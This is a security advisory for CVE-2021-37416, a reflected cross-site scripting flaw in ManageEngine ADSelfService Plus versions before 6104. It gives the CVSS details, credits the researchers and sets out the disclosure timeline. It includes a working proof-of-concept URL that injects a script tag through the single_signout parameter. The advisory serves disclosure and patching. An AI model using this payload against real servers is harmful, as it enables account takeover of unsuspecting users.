CVE-2021-37416

Name

Reflected XSS in LoadFrame page via single_signout parameter

CVSS score

6.1 (Medium)

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Product name

ManageEngine ADSelfService Plus

Confirmed exploitable versions

< 6104

Researcher

Krzysztof Andrusiak and Marcin Ogorzelski

Description

ADSelfServicePlus is prone to Reflected XSS attack via the single_signout parameter in /LoadFrame endpoint, potentially leading to victim's account takeover.

Proof-of-concept

Replace alpha-manage:8888 with ADSSP server address in the following URL:
http://alpha-manage:8888/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E
Visit modified URL - XSS should fire.

Timeline

17-03-2021 - Vulnerability reported to vendor
18-03-2021 - First response from vendor
08-05-2021 - Fixed version release
30-08-2021 - Public disclosure
21-02-2022 - PoC release

References

https://www.manageengine.com/products/self-service-password/release-notes.html
https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6104-released-with-an-important-security-fixes
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-37416